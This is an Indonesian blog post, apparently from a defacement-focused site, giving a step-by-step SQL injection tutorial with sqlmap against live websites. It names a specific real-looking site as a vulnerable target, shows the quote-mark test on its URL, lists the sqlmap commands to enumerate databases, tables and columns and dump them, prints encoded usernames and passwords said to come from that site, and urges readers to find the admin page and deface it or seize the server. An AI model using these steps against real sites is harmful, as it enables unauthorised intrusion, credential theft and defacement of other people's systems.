Tutorial Deface Di Linux : Dengan Sqlmap - Defa Squad

Tempat Belajar Deface

Post Top Ad

Tuesday, June 27, 2017

Tutorial Deface Di Linux : Dengan Sqlmap


Tutorial Sql Injection Dengan SQLMAP  Linux - SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter,jadi hacker dapat dengan mudah mendapatkan data dari website targetnya.

SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

oke setelah melihat tentang penjelasan tersebut kita akan langsung coba praktekan oke Tutorial Sql Injection Dengan SQLMAP Kali Linux

Tutorial Sql Injection Dengan SQLMAP Kali Linux

pertama yang harus anda lakukan adalah mencari target website yang vuln sql injection dengan menggunakan dork dibawah ini,copy paste dork ni di google
lalu setelah mendapatkan target kita coba tambahkan tanda ' pada ujung addres bar website target disini saya mempunyai website dengan bug sql injection yaitu http://www.woodbridgeparty.com/products.php?id=111 setelah itu saya coba tambahkan tanda petik di ujung angka 111 seperti inihttp://www.woodbridgeparty.com/products.php?id=111' maka akan ada error berarti web itu vuln sql injection dan kita bisa lanjutakan tahap berikutnya yaitu menginject bug tersebut dengan sqlmap
Tutorial Sql Injection Dengan Sqlmap 
setelah itu buka terminal dan masukan perintah berikut :
sqlmap -u http://website-target.com/contoh.php?id=1 --dbs silahkan ganti website target sesuai website yang kita inject yang memiliki bug sql injection seperti diatas

Tutorial Sql Injection Dengan SQLMAP Kali Linux

setalah itu tekan enter dan tunggu sampai sqlmap mendapatkan informasi database target proses ini kira kira sekitar 5 menit tergantu koneksi anda, setelah selesai kita akan mendapatkan database target maka langkah selanjutnya menampilkan tables databasetersebut denga perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase --tables

Tutorial Sql Injection Dengan SQLMAP Kali Linux

setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables --columns

Tutorial Sql Injection Dengan SQLMAP Kali Linux

tunggu beberapa saat sampai sqlmap menampilkna data columns dari tables databas web tersebut setelah mendapatkan columns database tersebut langkah terakhir kita hanya perlu men dump data columns tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump
Tutorial Sql Injection Dengan SQLMAP Kali Linux
tunggu beberapa saat sampai sqlmap berhasil mendump data columns database tersebut setelah selesai maka kita akan mendapatkan data web tersebut 
Sqlmap Kali Linux



dan akhirnya kita mendapatkan user dan pass web tersebut
+--------------------------+----------------------------------+
| uname                | upass                          |
+-------------------------+-----------------------------------+
| js7Xzco=            | jN/O193KyA==          |
| k9bIzMrTxw== | k9bIzMrTx6PU0A== |
+-------------------------+-----------------------------------+
tinggal kita kembangkan lagi sesuai keinginan kita contoh nya kita ingin dump table lain kita tinggal ganti nama tables nya dan kesananya sama saja setelah sampai tahap ini tinggal kita cari halaman admin web tersebut terserah deh web itu mau di apain ntah itu di deface di ambil server nya dan lain lain saya di sini cuman share ilmu yang saya miliki saja selebihnya jika di salahgunakan itu bukan tanggung jawab saya . sekian Tutorial Sql Injection Dengan SQLMAP Kali Linux kali ini semoga bermanfaat 

No comments:

Post a Comment

Post Top Ad